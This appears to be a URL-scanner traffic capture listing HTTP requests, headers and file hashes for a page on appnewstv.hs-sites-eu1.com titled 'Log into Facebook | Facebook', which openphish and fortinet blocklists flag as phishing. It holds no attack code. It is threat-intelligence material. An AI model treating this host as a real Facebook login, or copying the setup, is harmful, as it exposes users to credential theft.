                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff2b71bb0-fd92-43d0-8cd0-b426d0b88ee8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 15547
x-amzn-requestid: a78f7d90-84c3-4198-88bf-1d722c37f09f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yauv4EUDoAMF13A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f7ff-49535e5525606250306488ba;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:37:03 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: yP22CSG5x3BVfq29UMdw30TZcvuaL-kUDgjBZDUEMpRVDWqlZrCgdQ==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:42:05 GMT
age: 45835
etag: "366b2090d409d694b72b4b4131df46dd65d69c5a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   15547
Md5:    56811a1a20a467464e1f3da171ef8b14
Sha1:   366b2090d409d694b72b4b4131df46dd65d69c5a
Sha256: 4c208fb88884166adf4ecc5882f75948b4a87d85c76ad6e7137e8edbd125c996
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff7859b5f-1c86-429e-be16-f7b41657b096.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16980
x-amzn-requestid: f6211d45-1e26-49a6-8c46-412d8714501c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YSIvUHPwoAMFzFQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631d87fb-00d053687671af6214ea6ba9;Sampled=0
x-amzn-remapped-date: Sun, 11 Sep 2022 07:02:19 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 1ZhWlfWQgEMpTF4Nrnc3RTN71UZICYJTNpVNUvEsurjMDp2e8mta4Q==
via: 1.1 9b311162717b41c968f6f00426d88aaa.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 00:10:59 GMT
age: 36901
etag: "7674123112859fd79ee9214c5308ad6a5e4ed015"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16980
Md5:    d7be52d818b206e064541ef4f4b0786b
Sha1:   7674123112859fd79ee9214c5308ad6a5e4ed015
Sha256: bb011cf1e3c97c42f22c0553b64c23f120fa52d4bc7b56b5bde5678226aff0ce
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b4d822c-5153-4c55-bcb3-aa6ee72e3b62.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 6078
x-amzn-requestid: e09c099f-5a2d-49d7-b6ab-e16f09c28bd0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YavJEEM5IAMFreQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f8a0-0fbb7b3d0cd6fbfa04f5a5d2;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:39:44 GMT
x-amz-cf-pop: SEA73-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Ur-HTN2DS8b3ojSQldJOZi6YW2wtCwRfbGqxg49ZUJ_00hC_rFxYEw==
via: 1.1 9b21fd56256eda6d1379e32829c4c446.cloudfront.net (CloudFront), 1.1 5397b304713f6301c7c94ac084b6ed08.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:51:32 GMT
age: 45268
etag: "33d0dcadaa42179b2eae914c8ad16c9c088afbc9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6078
Md5:    f2157f7cfbdeb607f28ae51eb090f2c3
Sha1:   33d0dcadaa42179b2eae914c8ad16c9c088afbc9
Sha256: 135cd89c2c82f0f5e53d2612d5eac868c175b28a567a07e63a2073942e36a066
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf118ca5-e4f8-4e97-a3c2-87e36a56e609.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 9270
x-amzn-requestid: bba505a1-bbba-4d14-ad3a-1f72c028cc43
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YLj-YGaOIAMFeOw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631ae6c2-08d743cc73070f6653991180;Sampled=0
x-amzn-remapped-date: Fri, 09 Sep 2022 07:09:54 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: N0iUxQripFCaFLbMsp-lsFOMHDKzQUW3AHaWMyzOK9NGyAz5weDbvg==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 23:28:34 GMT
age: 39446
etag: "744a852e9357455d55e72809841411258fec44a9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9270
Md5:    b20499b3b8ef7b8ee73bd8b27e8c0c16
Sha1:   744a852e9357455d55e72809841411258fec44a9
Sha256: 457c8a9e4974a9529fa852b37f7ffc083e0eac987fe47aaebda808bf9f9f2941
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F26eefe41-9675-409e-9a6b-8c39594eb7de.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 7543
x-amzn-requestid: a8a09d68-971d-4d84-bf6b-ca78644927b4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yau8DHQ4IAMFzFQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f84c-54803f1d5f1777f334c7a4d5;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:38:21 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MdjZuif30Qf14NHbkELd3X2FqrPy5gGIJCnyjKrL2v5TY9DRD0VHiA==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 31119c39c5a6dc62dfa1fe940afd7be2.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:13:11 GMT
age: 43969
etag: "be8239300d4abfb14466655eedb6b277543ad8b2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7543
Md5:    967db8594cfbc60139ea4bccfe259742
Sha1:   be8239300d4abfb14466655eedb6b277543ad8b2
Sha256: eb6585e04cd275e2bf02c2cf8d8693e43f0c0a3e7fec0092fc2ff18025b45dde
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F363e6209-41ce-41be-bd4b-698c502410aa.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 8523
x-amzn-requestid: facc0fcf-fc31-4c49-bf47-4992b0496f5b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yav8AG1cIAMFmiQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f9e6-3a07501574e592610dcd9d83;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:45:10 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: wcReDELKUTdZfqKTbFNpzczrdUcvdH4XZGvajfVlcNduwLyHPfFpiw==
via: 1.1 7514e5e25722778fd4b1744d4ecc67e0.cloudfront.net (CloudFront), 1.1 e95ec8f1dc02e32f0cb9e113963ceb4e.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:00:47 GMT
etag: "e93a0bcbb4d394a087a6fd2a95e31cd371186433"
age: 44713
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8523
Md5:    69d287fa3fde0ea0ad5ac42fc708fb7d
Sha1:   e93a0bcbb4d394a087a6fd2a95e31cd371186433
Sha256: 5bb5a92d6498fee73ada8b2b8cf79ca4f6a7cd7ce35bab9b877870a847f212cc
                                        
                                            GET /classic/00/6.png HTTP/1.1 
Host: widgets.amung.us
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive

                                         
                                         104.22.75.171
HTTP/1.1 200 OK
Content-Type: image/png
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 1410
Connection: keep-alive
last-modified: Sun, 13 Jun 2010 09:03:09 GMT
etag: "4c149ecd-582"
expires: Sun, 11 Sep 2022 23:24:09 GMT
cache-control: max-age=2678400
access-control-allow-origin: *
CF-Cache-Status: HIT
Age: 298911
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74a86c034d219900-ARN


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1410
Md5:    e43e3ae20dc98a8bba17cda0793be0c3
Sha1:   29a97fff679609fba73ce7101033599f67e562d9
Sha256: c8a534024e9cc41a762cf27f44303b696f56cd20dcc9947126bd6192d4c3226e
                                        
                                            GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246913&callback=jsonpHandler HTTP/1.1 
Host: app-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.236.181
HTTP/2 204 No Content
date: Wed, 14 Sep 2022 10:26:01 GMT
cf-ray: 74a86c03fd8495de-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74a86c03fd8495de&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: d21f3635-c7ed-4431-9cb6-053973015ca0
x-trace: 2BE6BC9D93F807DD504BECC77526E82D8E05EE2FC0000000000000000000
set-cookie: __cf_bm=94yrk4dEUPTWGPFLfQiQSGPCHmdRmbf2bJdTJN1LpL8-1663151161-0-ARC4iiiiRMOFtubqKDT+XhbeHbtYpM0tLIZIE5f4/9+eiBHcAkgVUyxQRjYfydw1PDwJbXCwGIPSv5pjMBA+l6Q=; path=/; expires=Wed, 14-Sep-22 10:56:01 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.208.22
HTTP/2 200 OK
content-type: application/javascript;charset=utf-8
date: Wed, 14 Sep 2022 10:26:02 GMT
x-trace: 2B2D9E835AF3E42AB522B0F11BCD6998D2DA41E8E8000000000000000000
cache-control: public, max-age=30
vary: Accept-Encoding
x-hubspot-correlation-id: 35962987-4b8f-4281-835f-cddf2d63b924
access-control-allow-credentials: true
access-control-max-age: 3600
access-control-allow-origin: http://appnewstv.hs-sites-eu1.com
cf-cache-status: EXPIRED
last-modified: Wed, 14 Sep 2022 08:19:32 GMT
server: cloudflare
cf-ray: 74a86c0ba9a695fc-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   525
Md5:    24ade24f6b360c8a47061513294b5f71
Sha1:   0f3f65149f9386ff07b0f01de95828c5d767d123
Sha256: 74270bebdb68880902f36ee1cb17a3ecc047b01e5f6c86b03cdfd72762171b67
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F%230.3601203526844585&t=Log+into+Facebook+%7C+Facebook&cts=1663151147159&vi=e6aeadea164a902da047fa1f14bd8ee9&nc=true&u=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1&b=205882892.1.1663151147157&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
date: Wed, 14 Sep 2022 10:26:02 GMT
content-length: 45
cf-ray: 74a86c0c0ee90d52-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 10:26:02 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: 1b016721-1aeb-454e-8d8e-64e438f4ea57
x-robots-tag: none
set-cookie: __cf_bm=Q5PwYvNgccAEDkOdiCCGp52T2myhZ2x1O50H45w6JdQ-1663151162-0-AfYTIOD+E8cA2Bd74QKBh1KsN7l6WJ9qzyy9c772xDk5gzFGPO4ug4qaFt7THqTjLMK3vH/Wunzy0ej//U+BBeo=; path=/; expires=Wed, 14-Sep-22 10:56:02 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2B8vzHAnx5QlWk9TQy3O5LaEDpG6UIi7eG%2FZCCIG96SFHD2SjydXhylYTWufP7s3zS8ImJ3s7nnSppYYjs6uBC2JsXQNvB%2BbSCSCBMBVXsTMQ7f6FhrVNiZUsttctCiSzNtpeXimJA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F%230.3601203526844585&t=Log+into+Facebook+%7C+Facebook&cts=1663151148375&vi=e6aeadea164a902da047fa1f14bd8ee9&nc=true&u=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1&b=205882892.1.1663151147157&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
date: Wed, 14 Sep 2022 10:26:02 GMT
content-length: 45
cf-ray: 74a86c0c5f4d0d52-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 10:26:02 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: aa516379-cb41-4356-935a-d19ed9fbc119
x-robots-tag: none
set-cookie: __cf_bm=iEePw7Nqna5DmtpAL94qNCeHIcPHieRcx8jNGkg5iEM-1663151162-0-AfO0TggqYjlNDdux0ev1Elzqh/DMbTwKMMaObsD49ukGrvUv6iMuks698beUsN5Y1b36NxhpomKtcRxDu85ISzE=; path=/; expires=Wed, 14-Sep-22 10:56:02 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JdqHsOBKUVh7zeCXBjNfGSLoR1Ebnnar1sGaDetsyd6m52wtyWAKNB4bU%2B8MG14CZ7I%2FqJQ6%2F%2Bh%2BzXfwl%2B%2BeJ8xr7OOlgNkWX9Nn1O1ceb%2FA9e8QRJg4NNR3%2FoCKO8VWrFGu%2BeoGLg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            POST /_hcms/perf HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 739
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Cookie: __hstc=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1; hubspotutk=e6aeadea164a902da047fa1f14bd8ee9; __hssrc=1; __hssc=205882892.1.1663151147157

                                         
                                         172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Date: Wed, 14 Sep 2022 10:26:04 GMT
Content-Length: 2
Connection: keep-alive
CF-Ray: 74a86c178afd0b59-OSL
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
X-HubSpot-Correlation-Id: a4f48951-81be-4d82-a473-f0445098a248
X-Robots-Tag: none
X-Trace: 2BD24349C0BC3B0271FC5C6A78C6FCBCEAFE6BBA7C000000000000000000
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    e0aa021e21dddbd6d8cecec71e9cf564
Sha1:   9ce3bd4224c8c1780db56b4125ecf3f24bf748b7
Sha256: 565339bc4d33d72817b583024112eb7f5cdf3e5eef0252d6ec1b9c9a94e12bb3

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /analytics/1663151100000/26246913.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
date: Wed, 14 Sep 2022 10:26:01 GMT
x-amz-id-2: EtHDD3ZJ+jHFv9kGayq1VJF1GO72doBXHa4SUAaSBH/paVgPi+YlaUcoNmmVa05fqwQSJEkPjTc=
x-amz-request-id: YXXMVF8WG4KTQKHP
last-modified: Tue, 13 Sep 2022 13:50:54 GMT
etag: W/"a465556d49817da34d8ad624037e7756"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Wed, 14 Sep 2022 10:31:01 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74a86c041c36f14a-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (63804)
Size:   20217
Md5:    07371fc1a0807031f2b4ad03c43e8f99
Sha1:   50af4a7a69dbcea6267569c00172c7b52ef45b09
Sha256: c3827f08c5bd8ce062fc5e8c3c230d7f0bb591065c620b38f1cd5a4fa519f090
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-banner.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.202.201
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
date: Wed, 14 Sep 2022 10:26:00 GMT
x-amz-id-2: eMvK/+B+42bBRulR0IJXLilgHC+cniLzaOvjYRJ/vPUvuhfzQdr5DZbhrA9aZpZloYv8hRCJ5Mc=
x-amz-request-id: TZJG9K9055D38NE7
last-modified: Tue, 13 Sep 2022 13:50:52 GMT
etag: W/"32ad209e131aa4d3350f4e63295ad005"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
x-amz-version-id: UBvwYk_We_pJ5IIipKbbbJNIhGE5mW1n
access-control-allow-origin: https://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
expires: Wed, 14 Sep 2022 10:31:00 GMT
cf-cache-status: REVALIDATED
vary: Accept-Encoding
server: cloudflare
cf-ray: 74a86c018d401685-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
